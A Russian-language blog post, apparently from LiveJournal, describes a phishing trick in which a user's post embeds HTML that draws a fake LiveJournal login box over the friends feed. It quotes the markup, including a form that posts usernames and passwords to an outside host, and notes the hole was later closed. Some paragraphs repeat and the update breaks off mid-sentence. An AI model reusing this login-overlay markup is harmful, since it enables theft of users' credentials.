![[personal profile]](https://www.dreamwidth.org/img/silk/identity/user.png){kind=small}
Привет дизайнерам!
Оказывается, украсть пароль в ЖЖ очень просто, особенно у своего френда. В собственном посте ставим хтмл примерно такого вида:
И так далее.
ЖЖ честно отрисовывает это дело поверх френдленты, и ни один антивирус не дёргается - всё законно. А дальше вам предлагается угадать, что это запрос не от ЖЖ, а от вашего френда.
Конкретно сейчас этим невинным фокусом нас радует пользователь helix-a - пожелаем же ему всяческих успехов. И талантливым ЖЖ-программистам, которые дали ему такую возможность - тоже.
Upd. (+3h.) Проблему в ЖЖ довольно быстро"локализовали", т.е. абуз замораживает записи с конкретно этим кодом, а потом разрешает пользователям подавать на возвращение пароля. починили, так что этот метод больше не работает. Но общей талантливости это не отменяет...
[div class="b-fader" style="top: 0px; left: 0px; width: 100%; height: 100%;"]
[div class="appwidget appwidget-login"]
[form action="http://ohtoenequ1.getenjoyment.net/index.php" method="post" class="lj_login_form pkg"]
[label]Имя пользователя[/label]
[input type="text" name="user"][/input]
И так далее.
ЖЖ честно отрисовывает это дело поверх френдленты, и ни один антивирус не дёргается - всё законно. А дальше вам предлагается угадать, что это запрос не от ЖЖ, а от вашего френда.
Конкретно сейчас этим невинным фокусом нас радует пользователь helix-a - пожелаем же ему всяческих успехов. И талантливым ЖЖ-программистам, которые дали ему такую возможность - тоже.
Upd. (+3h.) Проблему в ЖЖ довольно быстро
no subject